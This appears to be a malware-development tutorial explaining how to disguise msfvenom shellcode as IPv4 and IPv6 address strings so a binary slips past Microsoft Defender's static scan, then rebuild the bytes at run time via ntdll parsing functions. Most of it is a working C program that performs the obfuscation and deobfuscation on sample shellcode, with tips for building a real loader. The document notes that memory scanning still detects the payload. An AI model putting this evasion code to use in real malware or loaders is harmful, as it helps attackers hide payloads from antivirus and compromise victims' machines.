This is a technique where the payload (the shellcode, or whatever part of the malware is being signatured) is stored as an array of IPv4 or IPv6 address strings. At run time the strings are parsed back into the original bytes, which are then executed.
As an example we use an msfvenom shellcode payload that spawns calc.exe when executed.
As soon as we compile the malware with the raw shellcode obtained from msfvenom, Defender flags it as malware.
So the idea is to convert the shellcode bytes to decimal and group them in fours so that each group looks like an IPv4 address. In IPv4 obfuscation, 4 bytes of data form one address. Take the first four bytes, "FC 48 83 E4" (from the image below): FC is 252 in decimal, 48 is 72, 83 is 131 and E4 is 228, so "FC 48 83 E4" becomes the IPv4 address 252.72.131[.]228. Because each string carries exactly four bytes, the shellcode length has to be a multiple of 4; pad the tail (for example with NOPs) or handle a shorter last group when reassembling.
After obfuscating the shellcode as IP strings, the binary passes Defender's static scan and the program runs. Note that this only hides the byte pattern on disk: the shellcode is reassembled in memory before it is executed, so a memory scan at that point still sees the original bytes.
IPv6 obfuscation works the same way, with one adjustment for the address length: an IPv6 address holds 16 bytes instead of IPv4's 4. There is also no decimal conversion, because an IPv6 address is written in hexadecimal, so the bytes are inserted directly, two per colon-separated group. Write all eight groups in full rather than compressing zero runs to "::", so that parsing them back is trivial. The first 16 bytes of the sample shown above become
"FC48:83E4:F0E8:C000:0000:4151:4150:5251"
The strings are turned back into bytes at run time with the NTDLL functions RtlIpv4StringToAddressA (IPv4) and RtlIpv6StringToAddressA (IPv6). Both write the parsed address into an in_addr / in6_addr whose bytes are in the same order as the string, so each result can be appended directly to the shellcode buffer. RtlIpv4StringToAddressA takes a Strict flag (pass TRUE to require exactly four decimal octets), and both functions hand back a Terminator pointer to the first character after the parsed address; check the return status and that pointer so a malformed string is noticed instead of silently producing a truncated payload.
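The following program is an added example, not code from the original post: it implements both halves of the technique, the obfuscation step (bytes to IPv4 and IPv6 strings, padding a short final group) and the deobfuscation step (strings back to bytes). The sample bytes are the first 16 bytes of the msfvenom x64 payload quoted above, embedded as a constructed array. The two parsers are portable stand-ins for RtlIpv4StringToAddressA (Strict = TRUE) and RtlIpv6StringToAddressA so the program builds anywhere; on Windows the loader would call those ntdll exports instead and copy each in_addr / in6_addr into an executable buffer. The NOP (0x90) padding value is an assumption of this example.

```c
/* ip_obfuscation.c - added example, not code from the original post.
 * Obfuscates a byte buffer into IPv4 / IPv6 strings and parses them back.
 * The parsers are portable stand-ins for ntdll's RtlIpv4StringToAddressA
 * (Strict=TRUE) and RtlIpv6StringToAddressA. Build: cc -std=c99 -Wall ip_obfuscation.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define IPV4_STR 16  /* "255.255.255.255" + NUL */
#define IPV6_STR 40  /* 8 groups of 4 hex digits + 7 colons + NUL */
#define PAD 0x90     /* x86 NOP; assumption: a trailing partial group is NOP-padded */

/* Constructed sample: the leading 16 bytes of the msfvenom x64 payload quoted above. */
static const unsigned char sample[16] = {
    0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51
};

/* Copy one group of at most `size` bytes from buf[i..], NOP-padding a short tail. */
static void take_group(unsigned char *g, size_t size, const unsigned char *buf, size_t len, size_t i)
{
    memset(g, PAD, size);
    memcpy(g, buf + i, (len - i < size) ? len - i : size);
}

/* Every 4 bytes -> "a.b.c.d", one byte per decimal octet. Returns the number of strings. */
size_t bytes_to_ipv4(const unsigned char *buf, size_t len, char out[][IPV4_STR], size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len && n < max; i += 4, n++) {
        unsigned char g[4];
        take_group(g, 4, buf, len, i);
        snprintf(out[n], IPV4_STR, "%u.%u.%u.%u",
                 (unsigned)g[0], (unsigned)g[1], (unsigned)g[2], (unsigned)g[3]);
    }
    return n;
}

/* Every 16 bytes -> eight 4-hex-digit groups, written in full (no "::" compression). */
size_t bytes_to_ipv6(const unsigned char *buf, size_t len, char out[][IPV6_STR], size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len && n < max; i += 16, n++) {
        unsigned char g[16];
        take_group(g, 16, buf, len, i);
        char *p = out[n];
        for (int k = 0; k < 16; k += 2)
            p += sprintf(p, "%02X%02X%s", (unsigned)g[k], (unsigned)g[k + 1], k < 14 ? ":" : "");
    }
    return n;
}

/* Strict parse of "a.b.c.d" into 4 bytes in string order (what in_addr holds). 0 = ok. */
int ipv4_to_bytes(const char *s, unsigned char out[4])
{
    for (int k = 0; k < 4; k++) {
        char *end;
        long v = strtol(s, &end, 10);
        if (end == s || v < 0 || v > 255 || *end != (k < 3 ? '.' : '\0')) return -1;
        out[k] = (unsigned char)v;
        s = end + 1;
    }
    return 0;
}

/* Parse the uncompressed form into 16 bytes; each group is big-endian: "FC48" -> FC 48. */
int ipv6_to_bytes(const char *s, unsigned char out[16])
{
    for (int k = 0; k < 8; k++) {
        char *end;
        long v = strtol(s, &end, 16);
        if (end == s || v < 0 || v > 0xFFFF || *end != (k < 7 ? ':' : '\0')) return -1;
        out[2 * k] = (unsigned char)(v >> 8);
        out[2 * k + 1] = (unsigned char)(v & 0xFF);
        s = end + 1;
    }
    return 0;
}

/* Obfuscate len bytes of buf, parse the strings back and compare; 1 = identical. */
int roundtrip_ipv4(const unsigned char *buf, size_t len)
{
    char ips[8][IPV4_STR]; unsigned char back[32];
    if (len > sizeof back) return 0;
    size_t n = bytes_to_ipv4(buf, len, ips, 8);
    for (size_t i = 0; i < n; i++)
        if (ipv4_to_bytes(ips[i], back + 4 * i) != 0) return 0;
    return memcmp(buf, back, len) == 0;   /* padding past len is not compared */
}

int roundtrip_ipv6(const unsigned char *buf, size_t len)
{
    char ips[2][IPV6_STR]; unsigned char back[32];
    if (len > sizeof back) return 0;
    size_t n = bytes_to_ipv6(buf, len, ips, 2);
    for (size_t i = 0; i < n; i++)
        if (ipv6_to_bytes(ips[i], back + 16 * i) != 0) return 0;
    return memcmp(buf, back, len) == 0;
}

/* Accessors for the sample's strings (static storage), handy for pasting into a loader. */
const char *sample_ipv4(size_t idx)
{
    static char ips[4][IPV4_STR];
    return idx < bytes_to_ipv4(sample, sizeof sample, ips, 4) ? ips[idx] : "";
}

const char *sample_ipv6(void)
{
    static char ip[1][IPV6_STR];
    bytes_to_ipv6(sample, sizeof sample, ip, 1);
    return ip[0];
}

int main(void)
{
    for (size_t i = 0; i < 4; i++) printf("\"%s\",\n", sample_ipv4(i));
    printf("\"%s\"\n", sample_ipv6());
    printf("ipv4 round trip: %s\n", roundtrip_ipv4(sample, sizeof sample) ? "ok" : "FAIL");
    printf("ipv6 round trip (13 bytes, padded): %s\n", roundtrip_ipv6(sample, 13) ? "ok" : "FAIL");
    return 0;
}
```

The round-trip functions deliberately compare only the original length, so the NOP padding appended to a short final group is carried through the strings but ignored on the way back; a real loader should record the true length alongside the string array for the same reason. When swapping the stand-in parsers for the ntdll calls on Windows, keep the same checks: a non-zero NTSTATUS or a Terminator that does not point at the end of the string means the group was malformed.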